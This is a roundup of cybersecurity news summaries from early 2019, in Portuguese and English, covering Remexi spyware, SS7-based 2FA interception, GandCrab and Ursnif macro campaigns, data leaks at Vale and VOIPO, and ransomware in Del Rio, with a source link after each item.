Grandstream e Sikur fazem parceria para oferecer comunicações comerciais seguras

By: TI Inside Online

A Grandstream, empresa de soluções de comunicações unificadas SIP, e a Sikur, anunciaram nesta quinta-feira, 7, a interoperabilidade entre soluções de voz e vídeo baseado, combinando ambas soluções para serem usadas em qualquer porte de empresa, que pode facilmente criar uma solução segura para colaboração em tempo real usando hardware e software de última geração.

A parceria entre a Grandstream e a Sikur cria uma nova maneira de as empresas colaborarem e manterem suas informações críticas seguras e privadas. O aplicativo SIKURPlatform estará disponível para download direto do aplicativo GS-Market em qualquer um dos dispositivos Grandstream baseados no Android, incluindo a série GVC de dispositivos de videoconferência, a série GXV de telefones de vídeo IP para Android e o telefone IP para conferências GAC2500. Como resultado, os usuários podem usar chamadas de voz e vídeo criptografadas, bate-papo criptografado, mensagens e até mesmo compartilhar documentos por meio do aplicativo SIKURPlatform em um ambiente seguro sem sair de seus dispositivos Grandstream.

“O poder de nossas soluções de videoconferência e conferência de negócios GXV, combinado com o software Sikur, abrirá as possibilidades para melhorar a segurança e a privacidade da colaboração dentro das organizações”, disse Jorge Otero, diretor de vendas da CALA na Grandstream. “Esta parceria fortalece a visão da Grandstream de fornecer a solução certa para cada tipo de usuário, e agora os executivos que desejam uma troca segura de voz, vídeo e dados através da plataforma SIKUR podem fazê-lo diretamente de sua mesa sem a necessidade de qualquer dispositivo adicional. ”

Mais: http://tiinside.com.br/tiinside/07/02/2019/grandstream-e-sikur-fazem-parceria-para-oferecer-comunicacoes-comerciais-seguras/?noticiario=TI

What’s Farsi for ‘as subtle as a nuke through a window’? Foreign diplomats in Iran hit by renewed Remexi nasty Iran, spying on foreigners within its borders? Shocked, shocked, we tell you

By: Shaun Nichols

A newly uncovered spyware-slinging operation appears to have been targeting foreign diplomats in Iran for more than three years.

Researchers at Kaspersky Lab said this week that a new build of the Remexi software nasty, first seen in 2015, has been spotted lurking on multiple machines within Iran, mostly those located within what we assume are foreign embassy buildings. The Windows-targeting surveillance-ware was previously associated with a hacking group known as Chafer, and an examination of the latest strain suggests it is of Iranian origin.

“The malware can exfiltrate keystrokes, screenshots, browser-related data like cookies and history, decrypted when possible,” Kaspersky’s Denis Legezo said of the infection.

“The attackers rely heavily on Microsoft technologies on both the client and server sides: the Trojan uses standard Windows utilities like Microsoft Background Intelligent Transfer Service (BITS) bitsadmin.exe to receive commands and exfiltrate data.”

Curiously, Legezo said he does not yet know how the malware is spreading in the wild, just that it is targeting “foreign diplomatic entities” based within Iran.

“So far, our telemetry hasn’t provided any concrete evidence that shows us how the Remexi malware spread,” we’re told.

“However, we think it’s worth mentioning that for one victim we found a correlation between the execution of Remexi’s main module and the execution of an AutoIt script compiled as PE, which we believe may have dropped the malware.”

Once on a victim’s machine, the spyware is very persistent, hiding out in scheduled tasks, Userinit and Run registry keys in the HKLM hive, depending on the version of Windows it has infected. Data is exfiltrated to command and control servers using Microsoft’s bitsadmin.exe transfer utility.

According to timestamps in the malware, its development appears to have been completed in March 2018, though there are a few sections of the code that appear to be much older.

More:  https://www.theregister.co.uk/2019/01/31/iran_embassies_malware/

SS7 exploited to intercept 2FA bank confirmation codes to raid accounts

By: Robert Abel

Cybercriminals are exploiting flaws in SS7, a protocol used by telecom companies to coordinate how they route texts and calls around the world, to empty bank accounts by intercepting messages sent for two-factor-authentication(2FA).

The exploit can allow threat actors to track phones across the planet and intercept text messages and phone calls without hacking the phone itself.

While known that intelligence agencies and surveillance contractors could carry out these kind of attacks, Motherboard reported confirmation of financially-motivated criminal organizations using the technique to empty accounts at the U.K.’s Metro Bank in a recent attack.

“At Metro Bank we take our customers’ security extremely seriously and have a comprehensive range of safeguards in place to help protect them against fraud,” a Metro Bank spokesperson told Motherboard in an email. “We have supported telecommunication companies and law enforcement authorities with an industry-wide investigation and understand that steps have been taken to resolve the issue.”

Customers at other banks have also been victims of these attacks and the spokesperson went on to say that those affected at their bank represent only a small percentage of those affected.

The attacks highlight the issued of the SS7 network not authenticating who sends requests so SS7 will treat the commands of whoever gains access to the network all the same regardless of the validity.

More: https://www.scmagazine.com/home/security-news/cybercriminals

Potential global cyber attack could cause $85 billion-$193 billion worth of damage: report

By: Noor Zainab Hussain Tanishaa Nadkar

(Reuters) – A co-ordinated global cyber attack, spread through malicious email, could cause economic damages anywhere between $85 billion and $193 billion, a hypothetical scenario developed as a stress test for risk management showed.

Insurance claims after such an attack would range from business interruption and cyber extortion to incident response costs, the report jointly produced by insurance market Lloyd’s of London and Aon said on Tuesday.

Total claims paid by the insurance sector in this scenario is estimated to be between $10 billion and $27 billion, based on policy limits ranging from $500,000 to $200 million.

The stark difference between insured and economic loss estimates highlights the extent of underinsurance, in case of such an attack, the stress test showed. An attack could affect several sectors globally, with the largest losses in retail, healthcare, manufacturing and banking fields.

Regional economies that are more service dominated, especially the United States and Europe, would suffer more and are vulnerable to higher direct losses, the report said.

Cyber attacks have been in focus after a virus spread from here Ukraine to wreak havoc around the globe in 2017, crippling thousands of computers, disrupting ports from Mumbai to Los Angeles and even halting production at a chocolate factory in Australia.

Governments are increasingly warning against the risks private businesses face from such attacks, both those carried out by foreign governments and financially motivated criminals.

More: https://www.reuters.com/article/us-wirecard-stocks/wirecard-denies-ft-report-alleging-financial-wrongdoing-idUSKCN1PO25C

Vale é hackeada e documentos mostram como empresa lida com acidentes

By: Felipe Payão

A mineradora multinacional brasileira Vale foi invadida e documentos internos supostamente confidenciais foram retirados e vazados por invasores. Hackers teriam se aproveitado de uma porta aberta no Microsoft SharePoint, ferramenta de software para colaboração em equipe, para resgatar atas, para extrair ocorrências e incidentes de segurança pelo mundo.

TecMundo recebeu os documentos na terça-feira (29) por uma fonte anônima. São cerca de 40 mil arquivos em uma pasta de 500 MB. Por lá, é possível encontrar incidentes de segurança que aconteceram entre 2017 e 2019 em áreas da Vale no Brasil, Canadá, Moçambique, Nova Caledônia e Indonésia.

“Um dos documentos relata assalto a mão armada em um duto, e não houve registro de ocorrência policial posterior”, afirmou a fonte no email em que enviou os documentos. O TecMundoencontrou o documento citado em específico, mas não a questão da ocorrência policial citada.

A Vale foi contatada sobre o incidente, contudo, não ofereceu qualquer resposta até o momento da publicação desta matéria — atualização: após a publicação, a companhia enviou uma nota que você confere abaixo. Do outro lado, os hackers não detalharam como a companhia foi invadida, apenas notaram que os documentos foram extraídos por meio de uma brecha na URL oculta que estava aberta ao público — “Indexação de documentos secretos em um subdomínio oculto, por meio de motores de busca”, notaram.

Mais: https://www.tecmundo.com.br/seguranca/138314-vale-hackeada-documentos-mostram-empresa-lida-acidentes.htm?f&utm_source=facebook.com&utm_medium=referral&utm_campaign=thumb

GandCrab ransomware and Ursnif virus spreading via MS Word macros

By: Swati Khandelwal

Security researchers have discovered two separate malware campaigns, one of which is distributing the Ursnif data-stealing trojan and the GandCrab ransomware in the wild, whereas the second one is only infecting victims with Ursnif malware.

Though both malware campaigns appear to be a work of two separate cybercriminal groups, we find many similarities in them. Both attacks start from phishing emails containing an attached Microsoft Word document embedded with malicious macros and then uses Powershell to deliver fileless malware.

Ursnif is a data-stealing malware that typically steals sensitive information from compromised computers with an ability to harvest banking credentials, browsing activities, collect keystrokes, system and process information, and deploy additional backdoors.

Discovered earlier last year, GandCrab is a widespread ransomware threat that, like every other ransomware in the market, encrypts files on an infected system and insists victims to pay a ransom in digital currency to unlock them. Its developers ask payments primarily in DASH, which is more complex to track.

MS Docs + VBS macros = Ursnif and GandCrab Infection

The first malware campaign distributing two malware threats was discovered by security researchers at Carbon Black who located approximately 180 variants of MS Word documents in the wild that target users with malicious VBS macros.

If successfully executed, the malicious VBS macro runs a PowerShell script, which then uses a series of techniques to download and execute both Ursnif and GandCrab on the targeted systems.

More: https://thehackernews.com/2019/01/microsoft-gandcrab-ursnif.html

Unprotected VOIP Server Exposed Millions of SMS Messages, Call Logs

By: Mohit Kumar

 

A California-based Voice-Over-IP (VoIP) services provider VOIPO has accidentally left tens of gigabytes of its customer data, containing millions of call logs, SMS/MMS messages, and plaintext internal system credentials, publicly accessible to anyone without authentication.

VOIPo is one of a leading providers of Voice-Over-IP (VoIP) services in the United States offering reseller VoIP, Cloud VoIP, and VoIP services to residentials and small businesses.

Justin Paine, the head of Trust & Safety at CloudFlare, discovered an open ElasticSearch database last week using the Shodan search engine and notified the VOIPO’s CTO, who then promptly secured the database that contains at least 4 years of data on its customers.

According to Paine, the database contained 6.7 million call logs dating back to July 2017, 6 million SMS/MMS logs dating back to December 2015, and 1 million logs containing API key for internal systems.

While the call logs included timestamp and duration of VOIPO customers’ VOIP calls and partial originating and destination phone numbers of those calls, the SMS and MMS logs even included the full content of messages.

Besides this, the unprotected database also stored 1 million logs containing references to internal hostnames, some of which also included plaintext usernames and passwords for those systems. These sensitive values were exposed since June 3, 2018.

More: https://thehackernews.com/2019/01/voip-service-database-hacking.html?fbclid=IwAR3MUyHbfv8Ck5QBrrxXi-Bci8vQiRZWGI8v1YxdPIjuQnZACpC4QEUfx-Y&&m=1

City of Del Rio Hit by Ransomware Attack

By: Kacy Zurkus

Another ransomware attack has made headlines with the city of Del Rio, Texas, announcing on January 10, 2019, that the servers at City Hall were disabled, according to a press release.

“The first step in addressing the issue, was for the City’s M.I.S. (Management Information Services) Department to isolate the ransomware which necessitated turning off the internet connection for all city departments and not allowing employees to log into the system. Due to this, transactions at City Hall are being done manually with paper.”

As has been the alternative method of communication for many organizations that have been impacted by cyber-attacks, Del Rio turned to social media, using Facebook to inform citizens of alternative payment options available to them.

After reporting the attack to the FBI, Del Rio was referred to the Secret Service. “The City is diligently working on finding the best solution to resolve this situation and restore the system. We ask the public to be patient with us as we may be slower in processing requests at this time,” the press release said.

More: https://www.infosecurity-magazine.com/news/city-of-del-rio-hit-by-ransomware/

Crypto-Mining, Banking Trojans Top Malware Threats

By: Kacy Zurkus

Crypto-mining malware has again topped the threat index, with Coinhive holding strong in the number one malware threat for the 13th consecutive month, according to the latest Global Threat Index for December 2018, published by Check Point.

The threat index looks at the most common active malware variants and trends as cyber criminals evolve toward crypto-mining and multipurpose malware.

A second-stage downloader, SmokeLoader, first identified back in 2011, jumped to ninth place on the December top-10 list. “After a surge of activity in the Ukraine and Japan, its global impact grew by 20. SmokeLoader is mainly used to load other malware, such as Trickbot Banker, AZORult Infostealer and Panda Banker,” according to a press release.

“December’s report saw SmokeLoader appearing in the top 10 for the first time. Its sudden surge in prevalence reinforces the growing trend towards damaging, multipurpose malware in the Global Threat Index, with the top 10 divided equally between crypto-miners and malware that uses multiple methods to distribute numerous threats,” said Maya Horowitz, threat intelligence and research group manager at Check Point.

“The diversity of the malware in the Index means that it is critical that enterprises employ a multilayered cybersecurity strategy that protects against both established malware families and brand new threats.”

More:  https://www.infosecurity-magazine.com/news/crypto-mining-banking-trojans-top/